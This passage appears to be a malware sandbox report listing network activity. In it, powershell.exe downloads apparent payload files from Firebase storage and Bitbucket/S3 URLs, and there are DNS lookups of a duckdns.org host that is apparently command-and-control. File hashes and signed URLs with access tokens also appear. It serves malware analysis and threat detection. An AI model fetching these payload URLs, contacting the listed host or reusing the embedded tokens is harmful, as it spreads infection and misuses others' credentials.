Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
x-amz-request-id: GZH6QFC5Z1XG7HJE
Date: Fri, 09 Aug 2024 01:27:28 GMT
Last-Modified: Tue, 06 Aug 2024 17:22:59 GMT
ETag: "aabd1a604f1a4028c9aed366338df3d0"
x-amz-server-side-encryption: AES256
x-amz-version-id: qJpdLnwvfTZhq5WLC.X4QTcIdjWQ3Hyy
Content-Disposition: attachment; filename="envionuevo.txt"
Accept-Ranges: bytes
Content-Type: text/plain
Server: AmazonS3
Content-Length: 64856
-
Remote address:8.8.8.8:53Request9.141.166.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request225.165.217.52.in-addr.arpaIN PTRResponse225.165.217.52.in-addr.arpaIN PTRs3-1-w amazonawscom
-
Remote address:8.8.8.8:53Requestzorra123.duckdns.orgIN AResponsezorra123.duckdns.orgIN A181.235.3.72
-
Remote address:8.8.8.8:53Request72.3.235.181.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request86.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request18.31.95.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
172.217.168.202:443https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362tls, httppowershell.exe1.9kB 48.5kB 26 41
HTTP Request
GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffeHTTP Response
200HTTP Request
GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362HTTP Response
200 -
204.79.197.237:443https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=tls, http22.0kB 9.3kB 22 19
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=HTTP Response
204 -
185.166.141.9:443https://bitbucket.org/dcasdc/descargas/downloads/envionuevo.txttls, httppowershell.exe803 B 8.7kB 9 11
HTTP Request
GET https://bitbucket.org/dcasdc/descargas/downloads/envionuevo.txtHTTP Response
302 -
52.217.165.225:443https://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315tls, httppowershell.exe3.2kB 73.7kB 36 64
HTTP Request
GET https://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315HTTP Response
200 -
7.0kB 6.0kB 62 60
-
76 B 220 B 1 1
DNS Request
firebasestorage.googleapis.com
DNS Response
172.217.168.202142.251.39.106142.250.179.138172.217.23.202142.250.179.170142.251.36.42142.251.36.10142.250.179.202216.58.214.10
-
56 B 151 B 1 1
DNS Request
g.bing.com
DNS Response
204.79.197.23713.107.21.237
-
74 B 113 B 1 1
DNS Request
202.168.217.172.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
20.160.190.20.in-addr.arpa
-
73 B 143 B 1 1
DNS Request
237.197.79.204.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
59 B 107 B 1 1
DNS Request
bitbucket.org
DNS Response
185.166.141.9185.166.141.8185.166.141.7
-
76 B 254 B 1 1
DNS Request
bbuseruploads.s3.amazonaws.com
DNS Response
52.217.165.22552.216.29.1483.5.30.6752.216.52.1613.5.28.1163.5.28.2133.5.29.1633.5.2.158
-
72 B 132 B 1 1
DNS Request
9.141.166.185.in-addr.arpa
-
73 B 107 B 1 1
DNS Request
225.165.217.52.in-addr.arpa
-
66 B 82 B 1 1
DNS Request
zorra123.duckdns.org
DNS Response
181.235.3.72
-
71 B 137 B 1 1
DNS Request
72.3.235.181.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
86.23.85.13.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
18.31.95.13.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82